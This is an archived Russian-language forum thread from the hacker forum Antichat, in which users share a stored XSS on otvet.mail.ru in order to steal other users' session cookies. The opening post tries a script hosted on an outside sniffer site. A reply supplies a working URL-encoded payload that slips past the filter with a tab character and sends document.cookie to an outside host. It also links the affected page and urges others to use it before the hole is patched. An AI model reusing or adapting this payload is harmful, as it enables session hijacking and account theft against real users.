Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активная XSS на otvet.mail.ru!!! (https://forum.antichat.xyz/showthread.php?t=31014)

DesignerMix 11.01.2007 11:42
Активная XSS на otvet.mail.ru!!!
 
Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш
Код:
%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ
Код:
<scriptsrc="http://www.naxodka.net/cookie.js"></script>
. Всё равно фильтрует гад, вот результат фильтрации
Код:
<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>
. По моему эта тема интерестна всем, так давайте её раскрутим, а?!!! :)

InferNo23 11.01.2007 13:11
Ура!=)
тоже сначала кодировал в разные кодировки результата 0.

достачно было поставить табуляцию между ht и tp

вот весь код:
Код:
%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E
страница с xss:
http://otvet.mail.ru/question/2334480/

юзаем пока не прикрыли=\

Z@P@DL0 11.01.2007 17:35
Цитата:
Сообщение от InferNo23
Ура!=)
тоже сначала кодировал в разные кодировки результата 0.

достачно было поставить табуляцию между ht и tp

вот весь код:
Код:
%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E
страница с xss:
http://otvet.mail.ru/question/2334480/

юзаем пока не прикрыли=\
Спасибо! Давно искал рабочию!

DesignerMix 11.01.2007 21:07
Всё лафа кончилась...прикрыли уязвимость, но кого это пугает??? Будем новые искать =).

Rebz 11.01.2007 21:09
быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)

tclover 11.01.2007 21:20
Цитата:
Сообщение от Rebz
быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)
ага, Андрюша, привет )

Abra 11.01.2007 22:32
Rebz да тут им делать нечего, просто написали в открытую про активную ксску, ну и куча придурков сразу полезла ее непрекрыто вставлять везде где тока можно. Там уж админы не полные дураки. только на половину...


Время: 02:02